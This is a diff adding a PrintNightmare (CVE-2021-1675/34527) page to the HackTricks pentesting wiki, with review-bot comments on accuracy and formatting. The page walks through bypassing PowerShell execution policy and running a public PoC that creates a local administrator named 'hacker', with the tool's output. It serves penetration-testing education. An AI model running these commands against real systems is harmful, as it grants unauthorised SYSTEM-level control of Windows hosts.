diff --git a/SUMMARY.md b/SUMMARY.md
index 8f4b6373a..2d75203c5 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -186,6 +186,7 @@
* [Over Pass the Hash/Pass the Key](windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md)
* [Pass the Ticket](windows-hardening/active-directory-methodology/pass-the-ticket.md)
* [Password Spraying](windows-hardening/active-directory-methodology/password-spraying.md)
+ * [PrintNightmare](windows-hardening/active-directory-methodology/printnightmare.md)
* [Force NTLM Privileged Authentication](windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md)
* [Privileged Groups](windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md)
* [RDP Sessions Abuse](windows-hardening/active-directory-methodology/rdp-sessions-abuse.md)
diff --git a/windows-hardening/active-directory-methodology/README.md b/windows-hardening/active-directory-methodology/README.md
index 3c66500b3..25e161e9d 100644
--- a/windows-hardening/active-directory-methodology/README.md
+++ b/windows-hardening/active-directory-methodology/README.md
@@ -186,6 +186,14 @@ You can get help from automatic tools such as:
Specially interesting from shares are the files called `Registry.xml` as they **may contain passwords** for users configured with **autologon** via Group Policy.
+### CVE-2021-1675/CVE-2021-34527 PrintNightmare
+
+This vulnerability allowed any authenticated user to **compromise the domain controller**.
+
+{% content-ref url="printnightmare.md" %}
+[printnightmare.md](printnightmare.md)
+{% endcontent-ref %}
+
## Privilege escalation on Active Directory WITH privileged credentials/session
**For the following techniques a regular domain user is not enough, you need some special privileges/credentials to perform these attacks.**
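Review bot: The one-line summary under the new `### CVE-2021-1675/CVE-2021-34527 PrintNightmare` heading ("allowed any authenticated user to **compromise the domain controller**") is broader than what printnightmare.md supports. That page ties the issue to a running Print Spooler and notes that the July 2021 patch together with the registry guidance addresses it. Suggest stating those conditions here, for example "allowed any authenticated user to run code as SYSTEM on a domain controller with the Print Spooler running, prior to the July 2021 patch", so the README entry tells readers which hosts are actually exposed.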
diff --git a/windows-hardening/active-directory-methodology/printnightmare.md b/windows-hardening/active-directory-methodology/printnightmare.md
new file mode 100644
index 000000000..438aca6cd
--- /dev/null
+++ b/windows-hardening/active-directory-methodology/printnightmare.md
@@ -0,0 +1,114 @@
+# PrintNightmare
+
+
+
+Support HackTricks and get benefits!
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+
+
+**This page was copied from** [**https://academy.hackthebox.com/module/67/section/627**](https://academy.hackthebox.com/module/67/section/627)****
+
+`CVE-2021-1675/CVE-2021-34527 PrintNightmare` is a flaw in [RpcAddPrinterDriver](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-rprn/f23a7519-1c77-4069-9ace-a6d8eae47c22) which is used to allow for remote printing and driver installation. \
+This function is intended to give **users with the Windows privilege `SeLoadDriverPrivilege`** the ability to **add drivers** to a remote Print Spooler. This right is typically reserved for users in the built-in Administrators group and Print Operators who may have a legitimate need to install a printer driver on an end user's machine remotely.
+
+The flaw allowed **any authenticated user to add a print driver** to a Windows system without having the privilege mentioned above, allowing an attacker full remote **code execution as SYSTEM** on any affected system. The flaw **affects every supported version of Windows**, and being that the **Print Spooler** runs by default on **Domain Controllers**, Windows 7 and 10, and is often enabled on Windows servers, this presents a massive attack surface, hence "nightmare."
+
+Microsoft initially released a patch that did not fix the issue (and early guidance was to disable the Spooler service, which is not practical for many organizations) but released a second [patch](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527) in July of 2021 along with guidance to check that specific registry settings are either set to `0` or not defined.
+
+Once this vulnerability was made public, PoC exploits were released rather quickly. **** [**This**](https://github.com/cube0x0/CVE-2021-1675) **version** by [@cube0x0](https://twitter.com/cube0x0) can be used to **execute a malicious DLL** remotely or locally using a modified version of Impacket. The repo also contains a **C# implementation**.\
+This **** [**PowerShell implementation**](https://github.com/calebstewart/CVE-2021-1675) **** can be used for quick local privilege escalation. By **default**, this script **adds a new local admin user**, but we can also supply a custom DLL to obtain a reverse shell or similar if adding a local admin user is not in scope.
+
+### **Checking for Spooler Service**
+
+We can quickly check if the Spooler service is running with the following command. If it is not running, we will receive a "path does not exist" error.
+
+```
+PS C:\htb> ls \\localhost\pipe\spoolss
+
+
+ Directory: \\localhost\pipe
+
+
+Mode LastWriteTime Length Name
+---- ------------- ------ ----
+ spoolss
+```
+
+### **Adding Local Admin with PrintNightmare PowerShell PoC**
+
+First start by [bypassing](https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/) the execution policy on the target host:
+
+```
+PS C:\htb> Set-ExecutionPolicy Bypass -Scope Process
+
+Execution Policy Change
+The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose
+you to the security risks described in the about_Execution_Policies help topic at
+https:/go.microsoft.com/fwlink/?LinkID=135170. Do you want to change the execution policy?
+[Y] Yes [A] Yes to All [N] No [L] No to All [S] Suspend [?] Help (default is "N"): A
+```
+
+Now we can import the PowerShell script and use it to add a new local admin user.
+
+```powershell
+PS C:\htb> Import-Module .\CVE-2021-1675.ps1
+PS C:\htb> Invoke-Nightmare -NewUser "hacker" -NewPassword "Pwnd1234!" -DriverName "PrintIt"
+
+[+] created payload at C:\Users\htb-student\AppData\Local\Temp\nightmare.dll
+[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_am
+d64_ce3301b66255a0fb\Amd64\mxdwdrv.dll"
+[+] added user hacker as local administrator
+[+] deleting payload from C:\Users\htb-student\AppData\Local\Temp\nightmare.dll
+```
+
+### **Confirming New Admin User**
+
+If all went to plan, we will have a new local admin user under our control. Adding a user is "noisy," We would not want to do this on an engagement where stealth is a consideration. Furthermore, we would want to check with our client to ensure account creation is in scope for the assessment.
+
+```
+PS C:\htb> net user hacker
+
+User name hacker
+Full Name hacker
+Comment
+User's comment
+Country/region code 000 (System Default)
+Account active Yes
+Account expires Never
+
+Password last set ?8/?9/?2021 12:12:01 PM
+Password expires Never
+Password changeable ?8/?9/?2021 12:12:01 PM
+Password required Yes
+User may change password Yes
+
+Workstations allowed All
+Logon script
+User profile
+Home directory
+Last logon Never
+
+Logon hours allowed All
+
+Local Group Memberships *Administrators
+Global Group memberships *None
+The command completed successfully.
+```
+
+
+
+Support HackTricks and get benefits!
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+
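Review bot: The patch paragraph in printnightmare.md says Microsoft gave "guidance to check that specific registry settings are either set to `0` or not defined" but never names those settings, and the only check the page offers is the `\\localhost\pipe\spoolss` listing, so a reader cannot tell a remediated host from an exposed one. Suggest naming the settings from the linked MSRC advisory and adding a short section that checks them alongside the Spooler check. Smaller points in the same file: the "Support HackTricks and get benefits!" block appears twice (top and bottom) and its Twitter link carries a broken `\[https:/emojipedia.org/bird/README.md` fragment; stray `****` runs follow "This page was copied from" and "released rather quickly." and surround "PowerShell implementation"; three of the four fences have no language tag while the fourth uses `powershell`; the `pDriverPath` output is split mid-word across two lines (`ntprint.inf_am` / `d64_ce3301b66255a0fb`); the `net user` output shows `?8/?9/?2021`, which looks like encoding debris in the date; and `"noisy," We would not` needs either a period or a lowercase "we".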
diff --git a/windows-hardening/windows-local-privilege-escalation/README.md b/windows-hardening/windows-local-privilege-escalation/README.md
index 5c2418ecb..119b908bd 100644
--- a/windows-hardening/windows-local-privilege-escalation/README.md
+++ b/windows-hardening/windows-local-privilege-escalation/README.md
@@ -61,6 +61,8 @@ Get-Hotfix -description "Security update" #List only "Security Update" patches
### Version Exploits
+This [site](https://msrc.microsoft.com/update-guide/vulnerability) is handy for searching out detailed information about Microsoft security vulnerabilities. This database has more than 4,700 security vulnerabilities, showing the **massive attack surface** that a Windows environment presents.
+
**On the system**
* _post/windows/gather/enum\_patches_
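Review bot: The added sentence under `### Version Exploits` hard-codes "more than 4,700 security vulnerabilities", an undated count that will be stale as the update guide grows. Suggest dropping the number or dating it ("as of ..."), and replacing the link text "This [site]" with the resource's name, for example "The [Microsoft Security Update Guide](...)", so the line still reads correctly out of context.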